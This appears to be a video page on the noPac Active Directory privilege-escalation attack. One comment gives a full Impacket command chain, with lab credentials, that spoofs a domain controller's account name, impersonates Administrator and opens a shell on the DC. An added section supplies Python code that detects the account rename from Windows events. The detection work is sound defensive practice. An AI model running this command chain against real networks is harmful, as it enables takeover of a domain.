Active Directory Privilege Escalation | sAMAccountName spoofing | nopac attack

Comments • 4

  • @kvzlx  a year ago

    This getST.py edit allows running S4U2Self only, with the -self flag, without S4U2Proxy being engaged right after: github.com/fortra/impacket/blob/a67c44cb8216daac48088e5b94d378418ab75533/examples/getST.py

  • @Ahictu  8 months ago

    Hello, can you tell me the theme you are using?

    • @kvzlx  8 months ago

      Archlinux, with a custom bspwm. You can find a lot of dotfiles on GitHub

  • @kvzlx  a year ago

    Commands:
    [*]>addcomputer.py -computer-name 'attack$' -computer-pass 'colombia1*' -dc-host DD-KVZLX -domain-netbios domain 'kvzlx.local/asreproast:2791@colombia'
    [*]>addspn.py -u 'kvzlx\asreproast' -p 2791@colombia -t 'attack$' --clear dc-kvzlx
    [*]>renameMachine.py -current-name "attack$" -new-name "DC-KVZLX" -dc-ip dc-kvzlx "kvzlx/asreproast:2791@colombia"
    [*]>getTGT.py -dc-ip dc-kvzlx "kvzlx.local/DC-KVZLX:colombia1*"
    [*]>KRB5CCNAME=DC-KVZLX.ccache getST.py -self -impersonate 'Administrator' -altservice 'cifs/dc-kvzlx.kvzlx.local' -k -no-pass -dc-ip dc-kvzlx kvzlx.local/dc-kvzlx
    [*]>KRB5CCNAME='dc.ccache' smbexec.py -target-ip 192.168.0.105 -dc-ip 192.168.0.105 -k -no-pass @'dc-kvzlx.kvzlx.local'
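
Seen from the detection side, the rename step in the command list above leaves a distinctive trace: a machine account (name ending in `$`) is renamed to a domain controller's name without the `$`. The following is an added example, not part of the original comments. It assumes Windows Security events 4741 (computer account created) and 4781 (account name changed) have been exported as dictionaries; the sample records, the DC inventory and the `find_spoofed_renames` helper are constructed for illustration.

```python
# Assumption: inventory of domain controller host names, without the trailing '$'.
DOMAIN_CONTROLLERS = {"DC-KVZLX"}

SAMPLE_EVENTS = [  # constructed records, reduced to the fields used below
    {"EventID": 4741, "SubjectUserName": "asreproast", "TargetUserName": "attack$"},
    {"EventID": 4781, "SubjectUserName": "asreproast",
     "OldTargetUserName": "attack$", "NewTargetUserName": "DC-KVZLX"},
    {"EventID": 4781, "SubjectUserName": "helpdesk",
     "OldTargetUserName": "WS01$", "NewTargetUserName": "WS02$"},
    {"EventID": 4781, "SubjectUserName": "helpdesk",
     "OldTargetUserName": "jsmith", "NewTargetUserName": "john.smith"},
]


def find_spoofed_renames(events, domain_controllers=DOMAIN_CONTROLLERS):
    """Return one finding per machine account renamed to a name without '$'."""
    dcs = {name.upper().rstrip("$") for name in domain_controllers}
    creators = {}  # machine account (upper case) -> user who created it (4741)
    findings = []
    for ev in events:
        if ev["EventID"] == 4741:
            creators[ev["TargetUserName"].upper()] = ev["SubjectUserName"]
        elif ev["EventID"] == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            if not old.endswith("$") or new.endswith("$"):
                continue  # not a machine account, or still a normal machine name
            findings.append({
                "old": old,
                "new": new,
                "renamed_by": ev["SubjectUserName"],
                # A name collision with a DC is the spoofing condition itself.
                "matches_dc": new.upper() in dcs,
                # Same user created and renamed the account: stronger signal.
                "created_by_renamer":
                    creators.get(old.upper()) == ev["SubjectUserName"],
            })
    return findings


if __name__ == "__main__":
    for finding in find_spoofed_renames(SAMPLE_EVENTS):
        print(finding)
```

Events must be fed in chronological order so that the creation record is seen before the rename it is correlated with.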